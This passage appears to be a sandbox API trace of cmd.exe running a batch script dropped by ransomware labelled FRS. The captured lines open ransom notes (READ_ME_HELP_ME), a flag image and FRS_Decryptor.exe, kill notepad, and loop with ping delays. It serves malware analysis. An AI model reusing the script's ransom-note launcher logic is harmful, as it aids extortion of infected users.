(hFile=0x260) returned 0x1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0135.921] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0135.921] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0135.921] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.921] GetFileType (hFile=0x260) returned 0x1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0135.921] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0135.921] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0135.921] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.921] GetFileType (hFile=0x260) returned 0x1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0135.921] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0135.921] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0135.921] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.921] GetFileType (hFile=0x260) returned 0x1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0135.921] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0135.921] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0135.921] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.921] GetFileType (hFile=0x260) returned 0x1 [0135.921] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0135.922] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0135.922] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0135.922] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.922] GetFileType (hFile=0x260) returned 0x1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0135.922] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0135.922] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0135.922] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.922] GetFileType (hFile=0x260) returned 0x1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0135.922] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0135.922] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0135.922] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.922] GetFileType (hFile=0x260) returned 0x1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0135.922] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0135.922] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0135.922] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.922] GetFileType (hFile=0x260) returned 0x1 [0135.922] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0135.923] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0135.923] SetFilePointer (in: hFile=0x260, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0135.923] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0135.923] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0135.923] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.923] GetFileType (hFile=0x260) returned 0x1 [0135.923] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0135.923] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0135.923] SetFilePointer (in: hFile=0x260, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0135.923] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0135.923] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0135.923] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.923] GetFileType (hFile=0x260) returned 0x1 [0135.923] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0135.923] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0135.923] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0135.923] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0135.923] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0135.923] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.923] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0135.924] _get_osfhandle (_FileHandle=0) returned 0x24 [0135.924] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0135.924] SetConsoleInputExeNameW () returned 0x1 [0135.924] GetConsoleOutputCP () returned 0x1b5 [0135.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0135.924] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.924] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0135.924] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0135.924] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.924] SetFilePointer (in: hFile=0x260, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0135.924] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0135.924] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0135.924] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0135.924] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0135.924] GetFileType (hFile=0x260) returned 0x1 [0135.924] _get_osfhandle (_FileHandle=3) returned 0x260 [0135.924] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0135.925] _tell (_FileHandle=3) returned 2512 [0135.925] _close (_FileHandle=3) returned 0 [0135.925] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0135.925] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0135.925] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0135.925] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0135.925] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0135.925] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0135.925] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0135.925] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0135.925] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0135.925] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0135.925] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0135.925] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0135.925] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0135.925] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0135.925] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0135.925] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0135.925] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0135.925] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0135.925] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0135.925] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0135.925] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0135.925] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0135.925] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0135.925] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0135.925] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0135.925] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0135.925] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0135.925] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0135.925] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0135.925] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0135.925] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0135.925] _wcsicmp (_String1="ping", _String2="START") returned -3 [0135.925] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0135.925] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0135.925] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0135.925] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0135.925] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0135.925] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0135.925] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0135.925] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0135.925] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0135.925] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0135.925] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0135.925] SetErrorMode (uMode=0x0) returned 0x0 [0135.925] SetErrorMode (uMode=0x1) returned 0x0 [0135.926] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0135.926] SetErrorMode (uMode=0x0) returned 0x1 [0135.926] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.926] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.926] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.926] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.926] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0135.926] GetLastError () returned 0x2 [0135.926] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.926] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a030 [0135.926] FindClose (in: hFindFile=0xd5a030 | out: hFindFile=0xd5a030) returned 1 [0135.926] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0135.926] GetLastError () returned 0x2 [0135.926] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0135.926] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0135.926] GetFileType (hFile=0x28) returned 0x2 [0135.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0135.927] _dup (_FileHandle=1) returned 3 [0135.927] _close (_FileHandle=1) returned 0 [0135.927] _wcsicmp (_String1="nul", _String2="con") returned 11 [0135.927] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0135.927] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0135.927] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0135.927] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0135.927] SetErrorMode (uMode=0x0) returned 0x0 [0135.927] SetErrorMode (uMode=0x1) returned 0x0 [0135.927] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0135.927] SetErrorMode (uMode=0x0) returned 0x1 [0135.927] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.927] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.927] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.927] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0135.927] GetLastError () returned 0x2 [0135.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.927] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a0b0 [0135.927] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0135.927] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0135.928] GetLastError () returned 0x2 [0135.928] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0135.928] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0135.928] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0135.928] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0135.928] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0135.928] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.928] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.929] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.929] 